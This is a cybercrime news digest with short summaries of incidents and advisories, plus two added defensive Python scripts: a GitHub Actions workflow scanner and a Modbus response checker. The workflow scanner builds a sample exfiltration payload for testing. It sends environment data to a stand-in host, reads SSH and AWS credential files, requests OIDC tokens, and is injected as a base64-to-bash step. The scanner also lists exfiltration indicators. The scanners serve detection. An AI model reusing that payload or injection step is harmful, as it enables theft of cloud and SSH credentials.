News

Short summaries of the cyber-crime stories moving in India and globally. We link back to the original source — always.

CERT-In Alerts on AI-Powered Cyber Attacks
Malware

India's CERT-In has issued an advisory on the growing threat of AI-driven cyberattacks, in which attackers use automated tooling to probe and breach systems. The advisory describes how AI is being used to make campaigns against organizations and individuals more sophisticated and better targeted. CERT-In recommends strengthening defences and monitoring network activity closely; users are advised to keep systems patched and to enforce sound security controls against these evolving threats. Source: sarkaritel.com

via GoogleNews: cyber attack India

Megalodon Attack Injects Malicious Code Into 5,500 GitHub Repos
Malware

A coordinated attack dubbed Megalodon compromised more than 5,500 public GitHub repositories by injecting malicious commits into their GitHub Actions workflows. Researchers at SafeDep detected the campaign on May 18; it pushed 5,718 harmful commits within six hours using stolen credentials. The commits modified workflow files to include base64-encoded scripts that steal cloud credentials, SSH keys, and OIDC tokens when the workflow runs. Major targets included repositories from the Wiznet, Tiledesk, and persian-tools projects. The researchers recommend watching for unexpected workflow runs and reviewing cloud audit logs for suspicious token requests. The operation resembled earlier TeamPCP attacks, including the use of backdated commits to obscure when the malicious changes were made. Source: SafeDep and OX Security Research.
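
The two checks a repository owner would want after reading the story are (a) does any workflow step decode an embedded base64 blob into a shell, and what does that blob do, and (b) do recent commits carry author dates far older than their committer dates. The script below is an added example written for this digest; it is not SafeDep's or OX Security's tooling, and the workflow text, payload, indicator list and `git log` lines it scans are constructed here for illustration.

```python
"""Added example: flag GitHub Actions workflow steps that decode an embedded
base64 blob into a shell, and spot commits whose author date was backdated.
Constructed sample input only; not SafeDep's or OX Security's code."""
import base64
import re

# Strings a decoded payload should never contain in an honest build step:
# credential files, the runner's OIDC token request variables, exfiltration.
INDICATORS = (
    "ACTIONS_ID_TOKEN_REQUEST_TOKEN",
    "ACTIONS_ID_TOKEN_REQUEST_URL",
    ".ssh/",
    ".aws/credentials",
    "curl ",
    "wget ",
    "env |",
)

# Loose match for a base64 run; the decoded content decides, not the match
# (a 40-hex-char pinned action SHA also matches but decodes to nothing useful).
B64_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
# `... | base64 -d | bash` style decode-and-execute pipelines.
DECODE_PIPE_RE = re.compile(r"base64\s+(?:-d|--decode|-D)[^\n|]*\|\s*(?:ba|z)?sh\b")


def decode_b64_blobs(text):
    """Return (prefix, indicators) for every base64 run in text whose decoded
    form contains one or more INDICATORS."""
    findings = []
    for match in B64_RE.finditer(text):
        blob = match.group(0)
        try:
            decoded = base64.b64decode(blob, validate=True).decode("utf-8", "replace")
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
        hits = [i for i in INDICATORS if i in decoded]
        if hits:
            findings.append((blob[:16], hits))
    return findings


def scan_workflow(text):
    """Return a list of human-readable findings for one workflow file."""
    findings = []
    if DECODE_PIPE_RE.search(text):
        findings.append("base64 decode piped into a shell")
    for prefix, hits in decode_b64_blobs(text):
        findings.append(f"encoded blob {prefix}... decodes to: {', '.join(hits)}")
    return findings


def find_backdated_commits(log_lines, max_skew=7 * 24 * 3600):
    """Parse `git log --format='%H %at %ct'` lines and return SHAs whose author
    timestamp is more than max_skew seconds older than the committer timestamp.
    Both dates are attacker-controlled, so treat a hit as a lead; the push
    event time in GitHub's audit/events log is the reliable anchor."""
    flagged = []
    for line in log_lines:
        sha, author_ts, committer_ts = line.split()
        if int(committer_ts) - int(author_ts) > max_skew:
            flagged.append(sha)
    return flagged


# --- constructed samples -------------------------------------------------
PAYLOAD = (
    'curl -s -X POST https://collector.example.invalid/ -d "$(env | base64 -w0)"; '
    "cat ~/.ssh/id_rsa ~/.aws/credentials; "
    'curl -s -H "Authorization: bearer $ACTIONS_ID_TOKEN_REQUEST_TOKEN" '
    '"$ACTIONS_ID_TOKEN_REQUEST_URL&audience=sts.amazonaws.com"'
)
ENCODED = base64.b64encode(PAYLOAD.encode()).decode()

CLEAN_WORKFLOW = """\
name: CI
on: [push]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: npm ci && npm test
"""
# Same workflow with one injected step of the kind described in the story.
INJECTED_WORKFLOW = CLEAN_WORKFLOW + "      - run: echo " + ENCODED + " | base64 -d | bash\n"

# Constructed `git log --format='%H %at %ct'` output: the second commit claims
# an author date of 2024-01-01 but was committed on 2025-05-18.
SAMPLE_LOG = [
    "1111111111111111111111111111111111111111 1747526400 1747526400",
    "2222222222222222222222222222222222222222 1704067200 1747526400",
]

if __name__ == "__main__":
    for finding in scan_workflow(INJECTED_WORKFLOW):
        print("workflow:", finding)
    print("backdated:", find_backdated_commits(SAMPLE_LOG))
```

Run it over every file under `.github/workflows/` in a checkout and over `git log --format='%H %at %ct' --since=<date>` output. The blob decoder reports what the payload touches, which is what tells you whether to rotate cloud keys, SSH keys, or the OIDC trust relationship; the date-skew check only narrows the window, since the push timestamp, not the commit dates, is what should anchor the timeline.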

via RSS: CSO Online

AppOmni's Marlin AI Automates SaaS Security Investigations
Data Breaches

AppOmni has launched Marlin AI, a tool designed to automatically detect and investigate misconfigurations in Software-as-a-Service (SaaS) applications used by enterprises. The AI system analyzes security vulnerabilities across cloud environments and traces related suspicious activities within organizational networks. It provides detailed remediation recommendations to address identified issues. However, the system stops short of implementing fixes automatically, requiring human approval before taking corrective actions. This approach balances efficiency with safety, allowing security teams to review recommendations before deployment. The development highlights growing reliance on AI for managing complex cloud security challenges in modern enterprises. Source: SecurityWeek.

via RSS: SecurityWeek

Iranian Hacker Group Targets Aviation, Software Firms
Malware

Nimbus Manticore, an Iranian advanced persistent threat (APT) group, continues targeting aviation and software companies with newly upgraded hacking tools. The group has maintained its cyber operations during and after recent US military activities against Iran. This represents an ongoing threat to critical infrastructure and technology sectors globally. Indian organizations in aviation and software development should enhance their security measures, including employee awareness training, network monitoring, and incident response protocols. Organizations are advised to patch vulnerabilities promptly and implement multi-factor authentication to mitigate risks from such state-sponsored cyber threats. Source: SecurityWeek.

via RSS: SecurityWeek

7-Eleven breach exposes 185,000 customers' personal data
Data Breaches

A significant data breach at 7-Eleven has compromised personal information of over 185,000 individuals. The leaked data includes sensitive details such as names, dates of birth, postal addresses, and Social Security numbers, as confirmed by state government records. This incident highlights the vulnerability of retail chains to cyber attacks and the risks customers face when their information is stored by large corporations. Affected individuals should monitor their accounts for suspicious activity and consider identity theft protection measures. Source: State Government Security Notice.

via RSS: TechCrunch Security

Federal Operation Dismantles Tech Support Scam Network
Social Engineering

US federal authorities have successfully shut down a large-scale tech-support scam operation that involved participants from India and the United States working in coordination. The scam typically targeted unsuspecting users by posing as legitimate technical support representatives, convincing victims to grant remote access to their devices or provide sensitive information. The operation involved multiple individuals across both countries in various roles, from executing the scams to managing financial aspects. This takedown represents a significant enforcement action against cross-border cybercriminal networks that have cost consumers substantial amounts through fraudulent technical support claims. Source: IndiaWest.

via GoogleNews: tech support scam

Microsoft Defender Gets Auto-Isolation for Compromised Systems
Malware

Microsoft is rolling out a new Defender for Endpoint feature that automatically isolates a compromised computer from the network so that attackers cannot spread to other systems. When a device is judged compromised, it is disconnected from the network, blocking lateral movement. The feature is still in a testing phase and is meant to shorten response time during incidents. For Indian organizations relying on Microsoft's security tools, it adds a containment step that limits damage before analysts intervene manually. Source: Microsoft's announcement, as reported by BleepingComputer.

via BleepingComputer

Security Experts Question Russian Hacking Claims Without Evidence
Data Breaches

Reform UK leader Nigel Farage claims Russian hackers infiltrated his phone and disclosed information about a £5 million financial gift. However, cybersecurity specialists have expressed skepticism, requesting concrete evidence to support the allegations. The incident highlights growing concerns about political figures being targeted by state-sponsored cyber operations. Experts emphasize that without substantiated technical proof, such claims remain unverified. This case underscores the importance of proper incident investigation and transparent communication when reporting potential breaches. Source: The Guardian.

via RSS: The Register Security

ABB Camera Connect Vulnerability from Outdated VLC Player
Malware

ABB has identified critical vulnerabilities in its Ability Camera Connect software versions 1.5.0.14 and below, stemming from an outdated VLC media player component (version 2.2.4). The vulnerabilities include heap-based buffer overflow and integer overflow issues that could allow attackers to crash the system or execute arbitrary code. The CVSS score is 9.8, indicating critical severity. ABB has released updates to address these flaws. The software is deployed globally across critical infrastructure sectors including energy, communications, and manufacturing. Users are advised to upgrade to patched versions immediately. Source: ABB Security Advisory.

via RSS: CISA Alerts

ABB AC500 V2 Controller Vulnerability Allows Data Access
Malware

ABB has disclosed a buffer over-read vulnerability (CVE-2025-7745) in its AC500 V2 industrial controller, which is used in critical manufacturing, energy, and water facilities worldwide. An attacker exploiting the flaw could retrieve fragments of Modbus telegrams previously sent by the programmable logic controller. Firmware versions 2.5.2 and earlier are affected. The CVSS score of 5.8 indicates medium severity; the flaw is reachable over the network and requires no authentication. ABB fixed the issue in firmware version 2.5.3, released in 2016, and later versions. Organizations still running AC500 V2 systems on older firmware should update promptly. Source: CISA.
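
The on-the-wire symptom of a controller over-reading its buffer is a Modbus response that carries more data than the matching request asked for. The following is an added example for this digest, not ABB's code, and it does not reproduce the CVE-2025-7745 trigger: it parses Modbus TCP frames, pairs register-read requests with their responses by transaction id, and reports responses whose byte count or payload disagrees with the requested quantity. All frames are constructed inline; the "first sighting of a transaction id is the request" pairing rule is an assumption that holds for a simple request/response capture.

```python
"""Added example: sanity-check Modbus TCP read-register exchanges for
responses that carry more data than was requested. Constructed frames only;
not ABB's code, and not a reproduction of CVE-2025-7745."""
import struct
from dataclasses import dataclass

READ_HOLDING = 0x03
READ_INPUT = 0x04


@dataclass
class Frame:
    transaction_id: int
    unit_id: int
    function: int
    data: bytes  # PDU bytes after the function code


def build_frame(transaction_id, unit_id, function, data):
    """Encode MBAP header + PDU. The length field counts unit id, function and data."""
    length = 1 + 1 + len(data)
    return struct.pack(">HHHB", transaction_id, 0, length, unit_id) + bytes([function]) + data


def parse_frame(raw):
    """Decode one Modbus TCP frame, rejecting malformed headers."""
    if len(raw) < 8:
        raise ValueError("frame shorter than MBAP header plus function code")
    transaction_id, protocol_id, length, unit_id = struct.unpack(">HHHB", raw[:7])
    if protocol_id != 0:
        raise ValueError(f"protocol id {protocol_id} is not Modbus")
    if length != len(raw) - 6:
        raise ValueError(f"MBAP length {length} disagrees with frame size {len(raw) - 6}")
    return Frame(transaction_id, unit_id, raw[7], bytes(raw[8:]))


def check_read_response(request, response):
    """Compare a 0x03/0x04 request with its response; return anomaly strings."""
    if request.function not in (READ_HOLDING, READ_INPUT):
        raise ValueError("only register read functions are checked")
    problems = []
    if response.transaction_id != request.transaction_id:
        problems.append("transaction id mismatch")
    if response.function == request.function | 0x80:
        return problems + [f"exception response, code {response.data[0]:#x}"]
    if response.function != request.function:
        return problems + ["function code mismatch"]
    _, quantity = struct.unpack(">HH", request.data[:4])  # start address, quantity
    byte_count = response.data[0]
    payload = response.data[1:]
    if byte_count != 2 * quantity:
        problems.append(f"byte count {byte_count} but {quantity} registers ({2 * quantity} bytes) were requested")
    if len(payload) != byte_count:
        problems.append(f"{len(payload)} payload bytes but byte count says {byte_count}")
    return problems


def audit(raw_frames):
    """Walk a captured sequence of frames, pairing requests with responses by
    transaction id (assumption: first sighting of an id is the request), and
    collect (transaction_id, anomaly) tuples."""
    pending, report = {}, []
    for raw in raw_frames:
        frame = parse_frame(raw)
        if frame.transaction_id not in pending:
            pending[frame.transaction_id] = frame
            continue
        request = pending.pop(frame.transaction_id)
        report.extend((frame.transaction_id, p) for p in check_read_response(request, frame))
    return report


# --- constructed capture: two reads of 2 holding registers from unit 1 -------
REQUEST_1 = build_frame(1, 1, READ_HOLDING, b"\x00\x00\x00\x02")
RESPONSE_1 = build_frame(1, 1, READ_HOLDING, b"\x04\x01\x02\x03\x04")  # 4 bytes, as requested
REQUEST_2 = build_frame(2, 1, READ_HOLDING, b"\x00\x00\x00\x02")
# Same request, but the reply carries 8 bytes: the extra four would be whatever
# sat in the controller's buffer, e.g. a fragment of an earlier telegram.
RESPONSE_2 = build_frame(2, 1, READ_HOLDING, b"\x08\x01\x02\x03\x04\xde\xad\xbe\xef")

if __name__ == "__main__":
    for tid, problem in audit([REQUEST_1, RESPONSE_1, REQUEST_2, RESPONSE_2]):
        print(f"transaction {tid}: {problem}")
```

Fed from a span-port capture on the PLC's Modbus segment, a rule like this catches the over-sized reply regardless of how it was provoked; it does not replace the firmware update, but it tells you whether anyone has been probing the controller in the meantime.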

via RSS: CISA Alerts

ABB Terra AC Charger Firmware Vulnerability Discovered
Malware

ABB has identified a heap memory overflow vulnerability (CVE-2025-5517) affecting multiple firmware versions of its Terra AC electric vehicle charging stations worldwide. An attacker able to tamper with unencrypted OCPP messages could compromise affected chargers, potentially gaining remote control and altering firmware behaviour. Impacted models include the UL40/80A, UL32A, MID/CE, and JP variants. ABB recommends updating immediately to the patched version for each model, 1.8.33 or 1.8.34. ABB also advises against unencrypted HTTP connections between chargers and management systems, even though the OCPP protocol permits them, to prevent malicious interference.

via RSS: CISA Alerts

Critical LiteSpeed cPanel Plugin Flaw Added to Active Exploit List
Malware

The US Cybersecurity and Infrastructure Security Agency (CISA) has identified a new actively exploited vulnerability in the LiteSpeed cPanel Plugin (CVE-2026-48172) that allows privilege escalation. The flaw has been added to CISA's Known Exploited Vulnerabilities Catalog, which tracks security weaknesses actively used by cyber criminals. While CISA's mandatory patching directive applies only to US federal agencies, the organization urges all businesses and organizations to prioritize fixing such vulnerabilities immediately. Privilege escalation flaws are commonly exploited by attackers to gain unauthorized system access. Organizations should review their systems and apply available patches promptly to prevent exploitation. Source: CISA.

via RSS: CISA Alerts